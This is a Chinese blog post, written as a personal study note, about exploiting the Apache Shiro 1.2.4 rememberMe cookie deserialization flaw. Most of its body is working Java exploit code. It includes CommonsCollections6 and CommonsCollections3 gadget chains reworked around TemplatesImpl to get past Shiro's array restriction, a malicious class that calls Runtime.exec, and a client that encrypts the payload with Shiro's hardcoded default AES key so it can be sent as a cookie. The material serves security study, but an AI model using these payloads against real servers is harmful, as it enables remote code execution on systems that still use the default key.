TemplatesImpl 在Shiro中的利用链学习1

于 2024-11-11 19:30:00 发布
阅读量1.4k 收藏 44
点赞数 38
分类专栏: java 审计 代码 文章标签: 学习 java 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/youuzi/article/details/143625662
版权

一、前言

在前面的学习中,我们学习了CC1、CC6链,其中CC1链受限于Java8u71版本,而CC6则是通杀的利用链;后来又将 TemplateImpl 融入到 CommonsCollections 利用链中,绕过了 InvokerTransformer 不能使用的限制,转用org.apache.commons.collections.functors.InstantiateTransformer 构造了CC3利用链,一样可以执行任意Java字节码;同时通过 TemplatesImpl 构造的利用链,理论上可以执行任意java代码,这是一种非常通用的代码执行漏洞,不受到对于链的限制,特别是内存马逐渐流行以后,执行任意 java代码的需求就更加浓烈了。

本文就通过————Shiro反序列化的漏洞,来实际学习下如何使用 TemplatesImpl

二、使用 CommonsCollections6 攻击 Shiro

1、环境安装和初步利用

Shiro反序列化的原理比较简单:为了让浏览器或服务器重启后用户不丢失登录状态,Shiro支持将持久化信息序列化并加密后保存在Cookie的rememberMe 字段中,下次读取时进行解密再反序列化。 但是在Shiro 1.2.4 版本之前内置了一个默认且固定的加密Key, 导致攻击者可以伪造任意的rememberMe Cookie,进而触发反序列化漏洞。

这里使用P牛简化的一个shrio1.2.4的登陆应用 整个项目只有两个代码文件,index.jsp 和login.jsp,依赖也仅有下面几个:

  • shiro-core、shiro-web, 这是shiro本身的依赖
  • javax.servlet-api、jsp-api, 这是JSP和Servlet的依赖,仅在编译阶段使用,因为Tomcat中自带这两个依赖
  • slf4j-api、slf4j-simple,这是为了显示shiro中的报错信息添加的依赖
  • commons-logging,这是shiro中用到的一个接口,不添加会爆 java.lang.ClassNotFoundException:org.apache.commons.logging.LogFactory错误
  • commons-collectons, 为了演示反序列化漏洞,增加了 commons-collections依赖
使用 mvn package 将项目打包成 war 包,放在 Tomcat webapps 目录下。然后访问
http://localhost:8080/shirodemo/ ,会跳转到登录页面:

然后输入正确的账号密码, root/secret ,成功登录:

如果登录时选择了remember me的多选框,则登录成功后服务端会返回一个rememberMe的Cookie:

攻击过程如下:

  1. 使用以前学过的CommonsCollections6利用链生成一个序列化Payload
  2. 使用Shiro默认key进行加密
  3. 密文作为 rememberMe的Cookie发送给服务端
生成payload CommonsCollections6.java

public class CommonsCollections6 {
    public byte[] getPayload(String command) throws Exception {
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class }, new String[] { command }),
                new ConstantTransformer(1),
        };
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

        Map expMap = new HashMap();
        expMap.put(tme, "valuevalue");

        outerMap.remove("keykey");

        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        return barr.toByteArray();
    }
}
使用Shiro默认Key进行加密: Client0.java

public class Client0 {
    public static void main(String[] args) throws Exception {
        byte[] payloads = new CommonsCollections6().getPayload("calc.exe");
        AesCipherService aes = new AesCipherService();
        byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
        System.out.println(key.toString());

        ByteSource ciphertext = aes.encrypt(payloads, key);
        System.out.println(ciphertext.toString());
    }
}

加密的过程,使用的shiro内置的类 org.apache.shiro.crypto.AesCipherService ,最后生成一段base64字符串。 直接将这段字符串作为rememberMe的值(不做url编码),发送给shiro。并没有弹出计算器,而是Tomcat出现了报错:

这是为什么?

2、冲突与限制

我们找异常信息的倒数第一行,也就是 org.apache.shiro.io.ClassResolvingObjectInputStream.resolveClass

这是一个 ObjectInputStream的子类,其重写了resolveClass 方法


package org.apache.shiro.io;

import org.apache.shiro.util.ClassUtils;
import org.apache.shiro.util.UnknownClassException;

import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;

/**
 * Enables correct ClassLoader lookup in various environments (e.g. JEE Servers, etc).
 *
 * @since 1.2
 * @see <a href="https://issues.apache.org/jira/browse/SHIRO-334">SHIRO-334</a>
 */
public class ClassResolvingObjectInputStream extends ObjectInputStream {

    public ClassResolvingObjectInputStream(InputStream inputStream) throws IOException {
        super(inputStream);
    }

    /**
     * Resolves an {@link ObjectStreamClass} by delegating to Shiro's 
     * {@link ClassUtils#forName(String)} utility method, which is known to work in all ClassLoader environments.
     * 
     * @param osc the ObjectStreamClass to resolve the class name.
     * @return the discovered class
     * @throws IOException never - declaration retained for subclass consistency
     * @throws ClassNotFoundException if the class could not be found in any known ClassLoader
     */
    @Override
    protected Class<?> resolveClass(ObjectStreamClass osc) throws IOException, ClassNotFoundException {
        try {
            return ClassUtils.forName(osc.getName());
        } catch (UnknownClassException e) {
            throw new ClassNotFoundException("Unable to load ObjectStreamClass [" + osc + "]: ", e);
        }
    }
}

resolveClass 是反序列化中用来查找类的方法,简单来说,读取序列化流的时候,读到一个字符串形式的类名,需要通过这个方法来找到对应的 java.lang.Class 对象。

对比一下它的父类,也就是正常的ObjectInputStream类中的 resolveClass 方法:

    protected Class<?> resolveClass(ObjectStreamClass desc)
        throws IOException, ClassNotFoundException
    {
        String name = desc.getName();
        try {
            return Class.forName(name, false, latestUserDefinedLoader());
        } catch (ClassNotFoundException ex) {
            Class<?> cl = primClasses.get(name);
            if (cl != null) {
                return cl;
            } else {
                throw ex;
            }
        }
    }

区别就是前者用的是 org.apache.shiro.util.ClassUtils#forName(实际上内部用到了 org.apache.cataline.loader.ParallelWebappClassLoader#loadClass) , 而后者用的是Java原生的 Class.forName.

关于这两者的区别,中间涉及到大量Tomcat对类加载的处理逻辑,参考文章

强网杯“彩蛋”——Shiro 1.2.4(SHIRO-550)漏洞之发散性思考 - zsx's Blog

http://www.rai4over.cn/2020/Shiro-1-2-4-RememberMe反序列化漏洞分析-CVE-2016-4437/

这里套用结论: 如果反序列化流中包含非Java自身的数组,则会出现无法加载类的错误。 这就是解释了为什么 CommonsCollections6无法利用了,因为其中用到了 Transformer 数组

3、构造不含数组的反序列化利用链

为了解决刚刚提到的问题,我们回顾下前文说过的 TemplatesImpl,可以通过下面的几行代码来执行一段Java的字节码:

TemplatesImpl obj = new TemplatesImpl();
setFieldValue(obj, "_bytecodes", new byte[][] {"...bytescode"});
setFieldValue(obj, "_name", "HelloTemplatesImpl");
setfieldValue(obj, "_tfactory", new TransformerFactoryImpl());

obj.newTranformer();

然后结合InvokerTranformer 调用 TemplatesImpl#newTransformer 方法,

Transformer[] transformers = new Transformer[]{
    new ConstantTransformer(obj),
    new InvokerTransformer("newTransformer", null, null)
}

不过,即使在这里,依旧用到了 Transformer 数组, 不符合条件? 所以进一步想想如何去除这一过程中的Transformer 数组呢?wh1t3p1g大佬的文章中给出了行之有效的方法。

回顾下CommonsCollections6利用链中,我们用到了 TiedMapEntry, 其构造函数接收两个参数,参数1 是一个Map, 参数2是一个key。 TiedMapEntry 类有个 getValue 方法, 调用了map的get方法,并传入key:

public object getValue() {
    return map.get(key);
}

当这个map 是LazyMap 时, 其get方法就是触发 transform的关键点:

   public Object get(Object key) {
        //create value for key if key is not currently in  the map
        if (!this.map.containsKey(key)) {
            Object value = this.factory.transform(key);
            this.map.put(key, value);
            return value;
        } else {
            return this.map.get(key);
        }
    }

我们以往构造CommonsCollections Gadget的时候,对LazyMap#get方法的参数key 是不关心的,因为通常 Transformer 数组的首个对象是 ConstantTransformer,我们通过ConstantTransformer 来初始化恶意对象。

但是当前由于我们没法使用Transformer 数组,也就不能使用ConstantTransformer 作为前置transformer, 但是我们发现 LazyMap#get 的参数 key,会被传进 tranformer(), 实际上它可以扮演ConstantTransformer的角色--简单的对象传递者。

那么我们再回看前面的 Transform 数组: 
Transformer[] transformers = new Transformer[]{
    new ConstantTransformer(obj),
    new InvokerTransformer("newTransformer", null, null)
}
new ConstantTransformer(obj) 这一步完全是可以去除了,数组长度变成 1 ,那么数组也就不需要
了。

4、改造CommonsCollections6攻击Shiro

运行环境:

java 1.8.0_71

commons-collections 3.2.1

首先还是创造 TemplatesImpl对象:

TemplatesImpl  obj = new TemplatesImpl();
setFieldValue(obj, "_bytecodes", new byte[][] {"...bytescode"});
setFieldValue(obj, "_name", "HelloImpl");
setFiledValue(obj, "_tfactory", new TransformerFactoryImpl());

然后我们创建一个用来调用 newTransformer 方法的InvokerTranformer, 但注意到 是,此时先传入一个人畜无害的方法,比如getClass, 避免恶意方法在构造 Gadget的时候触发:

Tranformer transformer = new InvokerTransformer("getClass", null, null);

再把之前的CommonsCollections6的代码复制过来,然后改上一节说到的点,就是将原来TiedMapEntry构造时的第二个参数key,改为前面创建的TemplatesImpl对象

Map innerMap = new HashMap();
Map outerMap = LazyMap.decorate(innerMap, transformer);

TiedMapEntry tme = new TiedMapEntry(outerMap, obj);

Map expMap = new HashMap();
expMap.put(tem, "valuvalue");

outerMap.clear()

这里没有用outerMap.remove("obj");  移除key的副作用,直接通过outerMap.clear(); 效果一样

最后,将 InvokerTranformer 的方法从人畜无害的 getClass ,改成newTranformer, 正式完成武器装配。 完整代码如下:
 

CommonsCollectionsShiro.java


import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CommonsCollectionsShiro {
    public static void setFieldValue(Object obj, String  fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public byte[] getPayload(byte[] clazzBytes) throws Exception{
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
        setFieldValue(obj, "_name", "Hellotemplate");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        Transformer transformer = new InvokerTransformer("getClass", null, null);

        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformer);

        TiedMapEntry tme = new TiedMapEntry(outerMap, obj);

        Map expMap =  new HashMap();
        expMap.put(tme, "valuevalue");

        outerMap.clear();
        setFieldValue(transformer, "iMethodName", "newTransformer");


        //生成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();
        return barr.toByteArray();

    }
}

同时写个Client.java来装配上面的CommonsCollectionsShiro

Client.java

import javassist.ClassPool;
import javassist.CtClass;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;

public class Client {
    public static void main(String []args) throws Exception {
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.get(evil.class.getName());
        byte[] payloads = new CommonsCollectionsShiro().getPayload(clazz.toBytecode());

        AesCipherService aes = new AesCipherService();
        byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");

        ByteSource ciphertext = aes.encrypt(payloads, key);
        System.out.printf(ciphertext.toString());
    }
}

恶意的字节码文件

evil.java

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class evil extends AbstractTranslet {
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}

    public evil() throws Exception {
        super();
        System.out.println("Hello TemplatesImpl");
        Runtime.getRuntime().exec("calc.exe");
    }
}
这里用到了 javassist ,这是一个字节码操纵的第三方库,可以帮助我将恶意类
evil.java  生成字节码再交给 TemplatesImpl 。 生成的POC ,在 Cookie 里进行发送,成功弹出计算器

5、改造 CommonsCollections3 攻击Shiro

运行环境:

java 1.8.0_71

commons-collections 3.2.1

同上,这里也改造一个CommonsCollections3 攻击Shiro的Poc

CommonsColections3_Shiro.java

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CommonsColections3_Shiro {

    public static void setFieldValue(Object obj, String  fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public byte[] getPayload(byte[] clazzBytes) throws Exception{
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
        setFieldValue(obj, "_name", "Hellotemplate");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        Transformer faketransformer = new ConstantTransformer(1);

        Transformer transformer = new InstantiateTransformer(new Class[]{ Templates.class}, new Object[]{ obj});

        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, faketransformer);

        TiedMapEntry tme = new TiedMapEntry(outerMap, TrAXFilter.class);

        Map expMap =  new HashMap();
        expMap.put(tme, "valuevalue");

        outerMap.clear();
        setFieldValue(outerMap, "factory", transformer);


        //生成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();
        return barr.toByteArray();

    }

其他 Client.java 和 evil.java 同上

三、注意项

Shiro 不是遇到 Tomcat 就一定会有数组这个问题
Shiro-550 的修复并不意味着反序列化漏洞的修复,只是默认 Key 被移除了

shiro反序列化之k1/2利用
weixin_45682070的博客
03-03 2048
前言 shiro的k1/k2条其实之前我已经分析过了,但是呢,没以文章的形式发出来。可能有点懒惰了。上篇文章我们一起看了t3协议,t3反序列化的修复手段是在resolveClass方法添加检查,增加黑名单的形式。而shiro是重写了resolveClass方法导致很多利用无法使用,但是shiro在编写的时候,并不是为了防御反序列化漏洞才去重写的resolveClass,但是就是这么一个无意间的举动,导致了防御住了大部分攻击。下面我们分析。 直接使用cc6 cc6的利用我们前面有,拿来直接用,默认key
Java Shiro反序列化CommonsCollections利用分析_shiro 利用(1)
2401_84968643的博客
05-12 935
本文主要分析CC1利用,先介绍了复现环境的搭建(该小节尽量帮大家避避坑,呜呜呜);然后紧跟着讲解了java反序列化和php反序列化漏洞的区别(希望大家不要有惯性思维认为反序列化漏洞都一样,其实java反序列化和php反序列化的差别还是很大的并介绍了复现学习java反序列化漏洞所需的一些前置知识;最后,也是文章的主体部分,从Sink(即可以触发执行命令的方法等)、chain及source(即利用的入口点)三个步骤,讲述利用的构建。
【Web】Java反序列化之从CC3看TemplatesImpl利用
uuzeray的博客
02-29 1436
都在InvokerTransformer上,若WAF直接禁用了该类,我们可以用CC3来突破,CC3的sink在于上面提到的TemplatesImpl的newTransformer方法,它最后会调用defineClass(),将字节码初始化成一个可控的类,若该类是有着精心构造的静态方法的恶意类,便可以完成攻击。在 Java 反序列化漏洞中,攻击者通常会构造恶意的序列化数据,通过触发反序列化操作来执行恶意代码。那么,接下来的问题是,从哪里去触发TemplatesImpl的newTransformer方法呢?
Java Shiro反序列化CommonsCollections利用分析
qq_44192006的博客
04-24 878
本文主要分析CC1利用,先介绍了复现环境的搭建(该小节尽量帮大家避避坑,呜呜呜);然后紧跟着讲解了java反序列化和php反序列化漏洞的区别(希望大家不要有惯性思维认为反序列化漏洞都一样,其实java反序列化和php反序列化的差别还是很大的并介绍了复现学习java反序列化漏洞所需的一些前置知识;最后,也是文章的主体部分,从Sink(即可以触发执行命令的方法等)、chain及source(即利用的入口点)三个步骤,讲述利用的构建。纸上得来终觉浅,绝知此事要躬行。
Shiro安全(三):Shiro自身利用之CommonsBeanutils
weixin_43263451的博客
08-05 2838
前面在利用shiro反序列化时,都是利用CC,但是这需要服务端引入CommonsCollections组件。所以最好是找到一条shiro自身的利用,而不需要任何的前提条件在之前曾介绍过,在反序列化这个对象时,为了保证队列顺序,会进行重排序的操作,而排序就涉 及到大小比较,进而执行 java.util.Comparator 接口的 compare() 方法。是否能够找到其他的Comparator呢本文主要是要理解如何在没有CC组件等外部依赖的情况下,找到shiro自身的利用来提高攻击的成功率。...
Apache shiro 反序列化利用
m0_54850467的博客
09-01 854
*触发反序列化流程:****结合Dnslog与URLDNS方法有一个前提是DNS能出网。那么在不出网的情况下就需要找一个替代的方案了。结合SQL盲注的思路,可以考虑执行如下代码结合时间延迟进行判断,若系统是linux系统,则睡眠10s同理,可以考虑结合触发Java异常进判断,若系统返回对应的报错系统,或者返回通用的报错提示,说明当前的key和gadget组合是成功的:**...
Shiro反序列化漏洞利用笔记
文公子的博客
12-10 7494
Shiro反序列化漏洞利用笔记 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。目前在Java web应用安全框架中,最热门的产品有Spring Security和Shiro,二者在核心功能上几乎差不多,但Shiro更加轻量级,使用简单、上手更快、学习成本低,所以Shiro的使用量一直高于Spring Security。产品用户量之高,一旦爆发漏洞波及范围相当广泛,研究相关漏洞是很有必要的。 一、Shiro反序列化漏洞 1.1 安全框架 Apache Sh
Fastjson JdbcRowSetImpl利用学习
虚幻私塾
04-15 1504
Python微信订餐小程序课程视频 https://blog.youkuaiyun.com/m0_56069948/article/details/122285951 Python实战量化交易理财系统 https://blog.youkuaiyun.com/m0_56069948/article/details/122285941 JdbcRowSetImpl 接着继续学习fastjson的第二条JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,而且其原理就是setter的自动调用,具体set
Shiro反序列化漏洞学习
qq_31065143的博客
06-13 1459
Shiro反序列化漏洞学习 前言 最近临近期末,事情变得很多,到了大二后感觉事情明显变多了,感觉人也很累,已经很久没有更新文章了,记得刚刚开始写博客是大一的时候,刚刚开始写博客也只是瞎搞,慢慢的开始注意到自己不能继续下去,于是就删除了以前的文章。尽管现在的文章质量也还是很低,但是希望自己能够慢慢进步。最近不仅要忙期末考试的事情、还要写项目,开始写项目发现自己的代码功底还是很弱,希望能在大三中改善这点。 shiro简介 简而言之,Apache Shiro 是一个强大灵活的开源安全框架,可以完全处理身份验证、授
开发知识点-JAVA-springboot+Spring Security/Shiro
aming小老弟
02-18 741
Spring 还提供了一个名为 Spring Security 的子项目,用于处理应用程序的安全需求。Spring Security 可以与 Shiro 集成,以提供更强大的安全功能。Shiro 提供了一套灵活的安全管理功能,可以处理用户身份验证、访问控制、会话管理等任务。因此,可以说 Shiro 是一个独立的安全框架,而 Spring 平台可以与 Shiro 一起使用来增强应用程序的安全性。Shiro 和 Spring 平台是两个不同的项目,它们可以在一起使用来提供安全认证和授权功能。
2024年hw蓝队初级面试总结_weblogic反序列化流量特征(1)
2401_84254530的博客
05-02 2359
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。,毕竟实战是检验真理的唯一标准嘛~最后就是项目实战,这里带来的是。
Java框架Shiro、漏洞工具利用、复现以及流量特征分析
最新发布
xt350488的博客
08-23 775
博客主页:Shiro(Apache Shiro)是一个强大且灵活的开源安全框架,专为Java应用程序提供安全性解决方案。它由Apache基金会开发和维护,广泛应用于企业级应用程序和Web应用程序中。Shiro的设计目标是简化应用程序的安全性配置和开发过程,提供易于使用的API和丰富的功能。本文主要介绍了Java框架Shiroshiro工具的流量特征,以及漏洞的复现。
TemplatesImpl利用与Fastjson注入内存马
weixin_42508548的博客
01-31 1251
TemplatesImpl利用是一个非常重要的东西,要知道,CC可以用它,CB也用它,注入内存马还是用它。因为它可以加载java字节码并实例化。ClassLoader,类加载器,是JVM执行类加载机制的前提,其主要任务为根据一个类的全限定名来读取此类的二进制字节流到JVM内部,然后转换为一个与目标类对应的java.lang.Class对象实例。文章第四部分,了解了实例化类的时候,会自动执行static{}代码块,{}代码块,无参构造方法那么如何注入内存马呢,也是通过newInstance实现。
[Java安全]利用TemplatesImpl执行字节码
Y4tacker的博客
07-25 3525
文章目录defineClass利用TemplatesImpl执行字节码 defineClass 介绍之前首先还是要知道defineClass的利用方式,下面给出简单的代码 public class TouchFile{ public TouchFile() throws Exception { Runtime.getRuntime().exec("calc"); } } 把它编译成字节码后Base64 之后运行 Method defineClass =
Shiro】Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)的解决方案
No8g攻城狮的博客
12-07 5349
Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)的解决方案
爆赞好文之java动态字节码加载(TemplatesImpl)简谈
2301_79724395的博客
04-17 1328
虽然已经学过了,不过忘完了,nice,重学动态加载就是很动态知道吧,你以为,说了等于没说,怎么个动态法呢?具体是在于三个函数loadClass()从已经加载的类缓存、父加载器等位置寻找类(其实就是双亲委派机制),在前面没有找到的情况下执行findClassfindClass()根据基础URL指定的方法来加载类的字节码,可能会在本地文件系统,jar包,或是远程http服务器上读取字节码,然后交给下一个函数defineClass()的作用就是处理前面传入的字节码,将其处理为真正的Java类。
Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)
热门推荐
yuguang的博客
11-17 1万+
目录 一.情况描述 1.漏洞描述 2.漏洞造成的影响 3.安全建议 4.技术参考 5.建设方案 6.漏洞证明 测试结果 二.springmvc修改 1.修改pom.xml配置 2.增加一个自定义秘钥代码 3.修改shiro配置 4.修改完之后测试 一.情况描述 1.漏洞描述 Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。 2.漏洞造成的影响 在配置了默认密钥的情况下,攻击者可以通过精心构造的 Payload 实现远.
X-ray捡洞中遇到的高频漏洞(Shiro默认key、备份文件&敏感目录泄露、Druid未授权访问、phpstudy-nginx解析漏洞、dedecms-cve-2018-6910)
Love&Share
11-10 1万+
用 X-Ray 刷洞发现一些出现频率高的漏洞,把漏洞原理和利用方式稍作整理,按照危害排名,低危漏洞可以收集一些信息然后深度利用变高危 文章目录直接利用Shiro默认keySql注入备份文件&敏感目录泄露Druid未授权访问XSS有条件利用phpstudy-nginx解析漏洞dedecms-cve-2018-6910鸡肋Apache Tomcat Examples未删除go-pprof资源监控信息泄露ELSE配置xray反连360提交漏洞 直接利用 Shiro默认key Xray提示:shiro/s.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值